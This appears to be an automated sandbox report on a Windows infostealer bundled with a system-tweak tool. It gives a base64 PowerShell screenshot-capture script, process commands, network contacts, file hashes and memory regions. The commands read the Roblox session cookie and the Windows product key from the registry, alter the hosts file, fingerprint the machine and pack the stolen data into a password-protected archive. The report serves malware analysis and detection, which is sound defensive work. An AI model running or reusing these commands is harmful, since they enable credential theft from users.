BCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\system32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rnnvktba\rnnvktba.cmdline"
C:\Windows\system32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC58.tmp" "c:\Users\Admin\AppData\Local\Temp\rnnvktba\CSCF51C99DC431C470EB442E55F62A0AC6.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\alpWw.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\alpWw.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Windows\system32\reg.exe
reg add "HKCU\Software\Hone" /v "Disclaimer" /f
C:\Windows\system32\curl.exe
curl -g -L -# -o "C:\Users\Admin\AppData\Local\Temp\Updater.bat" "https://raw.githubusercontent.com/auraside/HoneCtrl/main/Files/HoneCtrlVer"
C:\Windows\system32\Dism.exe
dism /online /enable-feature /featurename:MicrosoftWindowsWMICore /NoRestart
C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe
C:\Users\Admin\AppData\Local\Temp\C9E22CF5-E28A-476A-A2B2-3C0D44269A30\dismhost.exe {16FFE513-AB3D-4775-805B-D0AAF557EA14}
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "SystemRestorePointCreationFrequency" /t REG_DWORD /d 0 /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Unrestricted -NoProfile Enable-ComputerRestore -Drive 'C:\', 'D:\', 'E:\', 'F:\', 'G:\'
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Unrestricted -NoProfile Checkpoint-Computer -Description 'Hone Restore Point'
C:\Windows\system32\srtasks.exe
C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c date /t
C:\Windows\system32\reg.exe
reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKLM.reg /y
C:\Windows\system32\reg.exe
reg export HKCU C:\Hone\HoneRevert\11.14.2024\HKCU.reg /y
C:\Windows\system32\mode.com
Mode 130,45
C:\Windows\System32\choice.exe
C:\Windows\System32\choice.exe /c:1234567XD /n /m " Select a corresponding number to the options above > "
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | blank-jl67d.in | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| GB | 142.250.180.3:443 | gstatic.com | tcp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 162.159.136.232:443 | discord.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:50111 | tcp | |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI31722\python311.dll
| MD5 | 5f6fd64ec2d7d73ae49c34dd12cedb23 |
| SHA1 | c6e0385a868f3153a6e8879527749db52dce4125 |
| SHA256 | ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967 |
| SHA512 | c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab |
C:\Users\Admin\AppData\Local\Temp\_MEI31722\VCRUNTIME140.dll
| MD5 | 49c96cecda5c6c660a107d378fdfc3d4 |
| SHA1 | 00149b7a66723e3f0310f139489fe172f818ca8e |
| SHA256 | 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc |
| SHA512 | e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d |
memory/5196-26-0x00007FFC2B6D0000-0x00007FFC2BCB9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI31722\base_library.zip
| MD5 | bbbf46529c77f766ef219f4c146e6ef5 |
| SHA1 | de07c922c7f4ba08bc1a62cf3fabddecc64f877e |
| SHA256 | 734e277712e823fca86ca75bf5d4f85a21893208e683c4ab407be10c3b9052dc |
| SHA512 | 3371a3a806dac2cfec59cc42937b348af67e190a8d575efc6a81ec3d8b215f8a0cb94010142f9d02c8881040a2d6b8364d124f85285d9b3b04f36226fb4fae66 |
C:\Users\Admin\AppData\Local\Temp\_MEI31722\_ctypes.pyd
| MD5 | 00f75daaa7f8a897f2a330e00fad78ac |
| SHA1 | 44aec43e5f8f1282989b14c4e3bd238c45d6e334 |
| SHA256 | 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f |
| SHA512 | f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4 |
C:\Users\Admin\AppData\Local\Temp\_MEI31722\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
memory/5196-34-0x00007FFC432F0000-0x00007FFC432FF000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI31722\blank.aes
| MD5 | 52b5788c281513d74bf5f1ee6a989cb8 |
| SHA1 | 379318c37380fc6a3fbd50a66940cb44b9ff61e8 |
| SHA256 | c1e49817d2969a3ecd721eecefe95b4baa4583af4eecf550df32675685b6193f |
| SHA512 | 817927309fc3904565b5c48ac5efa9869338b7a318d1523f24b14abcf33a53aa64cb6eef481c7e1f98d5f2879503fc00bdfd16aa3ba141a0c9314c186f76ff05 |
memory/5196-31-0x00007FFC41240000-0x00007FFC41263000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI31722\_lzma.pyd
| MD5 | 542eab18252d569c8abef7c58d303547 |
| SHA1 | 05eff580466553f4687ae43acba8db3757c08151 |
| SHA256 | d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9 |
| SHA512 | b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958 |
memory/5196-41-0x00007FFC41210000-0x00007FFC4123D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI31722\_bz2.pyd
| MD5 | c413931b63def8c71374d7826fbf3ab4 |
| SHA1 | 8b93087be080734db3399dc415cc5c875de857e2 |
| SHA256 | 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293 |
| SHA512 | 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f |
memory/5196-44-0x00007FFC426D0000-0x00007FFC426E9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI31722\_sqlite3.pyd
| MD5 | 1a8fdc36f7138edcc84ee506c5ec9b92 |
| SHA1 | e5e2da357fe50a0927300e05c26a75267429db28 |
| SHA256 | 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882 |
| SHA512 | 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0 |
C:\Users\Admin\AppData\Local\Temp\_MEI31722\sqlite3.dll
| MD5 | dbc64142944210671cca9d449dab62e6 |
| SHA1 | a2a2098b04b1205ba221244be43b88d90688334c |
| SHA256 | 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c |
| SHA512 | 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b |
memory/5196-50-0x00007FFC2B550000-0x00007FFC2B6C7000-memory.dmp
memory/5196-48-0x00007FFC40120000-0x00007FFC40143000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI31722\_socket.pyd
| MD5 | 1a34253aa7c77f9534561dc66ac5cf49 |
| SHA1 | fcd5e952f8038a16da6c3092183188d997e32fb9 |
| SHA256 | dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f |
| SHA512 | ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a |
memory/5196-53-0x00007FFC400A0000-0x00007FFC400B9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI31722\select.pyd
| MD5 | 45d5a749e3cd3c2de26a855b582373f6 |
| SHA1 | 90bb8ac4495f239c07ec2090b935628a320b31fc |
| SHA256 | 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876 |
| SHA512 | c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea |
memory/5196-57-0x00007FFC432E0000-0x00007FFC432ED000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI31722\libcrypto-3.dll
| MD5 | 78ebd9cb6709d939e4e0f2a6bbb80da9 |
| SHA1 | ea5d7307e781bc1fa0a2d098472e6ea639d87b73 |
| SHA256 | 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e |
| SHA512 | b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122 |
memory/5196-60-0x00007FFC3D4C0000-0x00007FFC3D4F3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI31722\_ssl.pyd
| MD5 | f9cc7385b4617df1ddf030f594f37323 |
| SHA1 | ebceec12e43bee669f586919a928a1fd93e23a97 |
| SHA256 | b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6 |
| SHA512 | 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb |
C:\Users\Admin\AppData\Local\Temp\_MEI31722\libssl-3.dll
| MD5 | bf4a722ae2eae985bacc9d2117d90a6f |
| SHA1 | 3e29de32176d695d49c6b227ffd19b54abb521ef |
| SHA256 | 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147 |
| SHA512 | dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73 |
memory/5196-66-0x00007FFC3C720000-0x00007FFC3C7ED000-memory.dmp
memory/5196-69-0x00007FFC41240000-0x00007FFC41263000-memory.dmp
memory/5196-68-0x0000019821C30000-0x0000019822150000-memory.dmp
memory/5196-67-0x00007FFC2B030000-0x00007FFC2B550000-memory.dmp
memory/5196-65-0x00007FFC2B6D0000-0x00007FFC2BCB9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI31722\_hashlib.pyd
| MD5 | b227bf5d9fec25e2b36d416ccd943ca3 |
| SHA1 | 4fae06f24a1b61e6594747ec934cbf06e7ec3773 |
| SHA256 | d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7 |
| SHA512 | c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e |
C:\Users\Admin\AppData\Local\Temp\_MEI31722\_queue.pyd
| MD5 | 347d6a8c2d48003301032546c140c145 |
| SHA1 | 1a3eb60ad4f3da882a3fd1e4248662f21bd34193 |
| SHA256 | e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192 |
| SHA512 | b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06 |
memory/5196-73-0x00007FFC3D680000-0x00007FFC3D694000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI31722\bound.blank
| MD5 | cad54859340aaefe3491c1e3bb6ab204 |
| SHA1 | 751d2dd0769585f334d7b77c0b07a8c7051f91aa |
| SHA256 | f7c3e0c208aa535125a233c7c2ced5aba53537ed6d093464c25bc68521d5082b |
| SHA512 | 482591d9f825812e8f5a2820b1c964076be8f5ca7e04281b40742ab66037c3e34936319bea8421585a140a9bf30c2c45eb3cbc9cf48b7bbf11488159ba9aa3d7 |
C:\Users\Admin\AppData\Local\Temp\_MEI31722\unicodedata.pyd
| MD5 | 8c42fcc013a1820f82667188e77be22d |
| SHA1 | fba7e4e0f86619aaf2868cedd72149e56a5a87d4 |
| SHA256 | 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2 |
| SHA512 | 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4 |
memory/5196-80-0x00007FFC426D0000-0x00007FFC426E9000-memory.dmp
memory/5196-81-0x00007FFC2AF10000-0x00007FFC2B02C000-memory.dmp
memory/5196-76-0x00007FFC40F50000-0x00007FFC40F5D000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bound.exe
| MD5 | 927c47fb56b681f9395ba430ab47e311 |
| SHA1 | 6cab388228bcb1f701fc6d3b7a256b8a259d2e26 |
| SHA256 | 8f269626d102b795d411666f896b1227736815f38c0a952224db01ca2b30bf56 |
| SHA512 | b338a3138ce64d46ab608d095ef8a1358a054e5073f9d9de0c98e3f3f33e4cd843d223321d8e672b869c2171a6ee719e50e020ebff5c55e85f37cd199cac0383 |
memory/3392-91-0x000002D462230000-0x000002D462252000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ulgbyxop.o1w.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\BF87.tmp\BF88.tmp\BF89.bat
| MD5 | dac3246a897d2448c4b572f5a159cd0d |
| SHA1 | 15ff4f8282940fd6e448dcd2a1cb82ba1eab3a13 |
| SHA256 | 1605c33720463f5d1fa2ca95c4904081df6caf5a26c98dab221244be293cb4bc |
| SHA512 | 907c5bab48430b9bfcff63fac115d11bb8db28fda73ed3fc5320f3b90396ef5d3d4dc39cb274c04530cc659329aa05833f668fde5b8c6d783f183346f0fa26ce |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | aa4f31835d07347297d35862c9045f4a |
| SHA1 | 83e728008935d30f98e5480fba4fbccf10cefb05 |
| SHA256 | 99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0 |
| SHA512 | ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e8eb51096d6f6781456fef7df731d97 |
| SHA1 | ec2aaf851a618fb43c3d040a13a71997c25bda43 |
| SHA256 | 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864 |
| SHA512 | 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2 |
memory/5196-119-0x00007FFC40120000-0x00007FFC40143000-memory.dmp
memory/5196-120-0x00007FFC2B550000-0x00007FFC2B6C7000-memory.dmp
memory/5196-121-0x00007FFC400A0000-0x00007FFC400B9000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | f99e42cdd8b2f9f1a3c062fe9cf6e131 |
| SHA1 | e32bdcab8da0e3cdafb6e3876763cee002ab7307 |
| SHA256 | a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0 |
| SHA512 | c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6 |
\??\c:\Users\Admin\AppData\Local\Temp\rnnvktba\rnnvktba.cmdline
| MD5 | 4bdc96da7d485d26f200a4a2966477f5 |
| SHA1 | 7d523fe79fbc029e8b978ad6c87a6b0fa6c54628 |
| SHA256 | 952b06eba0a35b065aa2246dd67f75b683f93821e59c85584c1402607b5be7a9 |
| SHA512 | c97d3c2d79cfea4287b9f819eed4c3a464170d10150756ea4302b072057c86a363703ceeee39733ba3fc25c038cd97f3a80d38068a49e318676acb32c8097597 |
\??\c:\Users\Admin\AppData\Local\Temp\rnnvktba\rnnvktba.0.cs
| MD5 | c76055a0388b713a1eabe16130684dc3 |
| SHA1 | ee11e84cf41d8a43340f7102e17660072906c402 |
| SHA256 | 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7 |
| SHA512 | 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2 |
\??\c:\Users\Admin\AppData\Local\Temp\rnnvktba\CSCF51C99DC431C470EB442E55F62A0AC6.TMP
| MD5 | 06a3b0898cda17791805b1176a2ae4b9 |
| SHA1 | cb47086e7dc17089776bde3328d0b50488e0f84b |
| SHA256 | 17da0e84a7f0eb80dedda6af99ea87849b97f04f6125353f5e0a15dc4badc5f8 |
| SHA512 | c27dbd59e0598c71b08f9080e0eff5e0c2f352820b9b8b35f95d8dae90216cfa8d1a42bbd07a9b74ca4a9c4f2d63c1111a8fc86b09d5e665512ba1be40b8ad14 |
C:\Users\Admin\AppData\Local\Temp\RESCC58.tmp
| MD5 | 681e85208ad50ff96665865d2cbc5a70 |
| SHA1 | 359ebee6c85544eaca27f4e5f46b8879eb0c688b |
| SHA256 | 64d7dee74fece145aa71e545a47ec87f54d6ff784404ef06b71e82833eb489c6 |
| SHA512 | 70c4610fa6926f2a8ca0d4bb43573d9ad592e5fb032072aedd9ced8ff8d78e76595fbdc88abbe61621f9149f05ee9cbc873bb95d5dea6ad6e35d3d3cb585888e |
C:\Users\Admin\AppData\Local\Temp\rnnvktba\rnnvktba.dll
| MD5 | 4c640120a4dd7c51ac10fee029e6796a |
| SHA1 | 170529852c51790f5fd18313139221dec24557b3 |
| SHA256 | 3cb380b95a5fb56b236032f2f5084f71b642a49fb12bb59ff4469a9daccd1598 |
| SHA512 | c421ff9b0a77f079fe423a0c85017b422de5f9abf117ba871acd4e959def432396571b3291b877f0b3f5a98f45b26e4bf11128d0d2ea3b7ec0b72fe3b379484c |
memory/1600-195-0x0000021F2CD20000-0x0000021F2CD28000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | e79ac46cc3f1bdf343b3d6aa4d243a74 |
| SHA1 | 7f3532a550cbe5e0f42c97a8690efe564e512393 |
| SHA256 | 741b380f81234eb877d7f411f5cdef3cd75f68c23e0d1e3928caa050978fcbc4 |
| SHA512 | b2fc181e5048a04ae773f4b23db76c60eaa39fbdbb95c84a2b6e37f922b5e259d26ff93d3dade5a398119cf275852999706a0a8ab9d3ea783dfa9465503f9f93 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7332074ae2b01262736b6fbd9e100dac |
| SHA1 | 22f992165065107cc9417fa4117240d84414a13c |
| SHA256 | baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa |
| SHA512 | 4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2 |
C:\Users\Admin\AppData\Local\Temp\_MEI31722\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
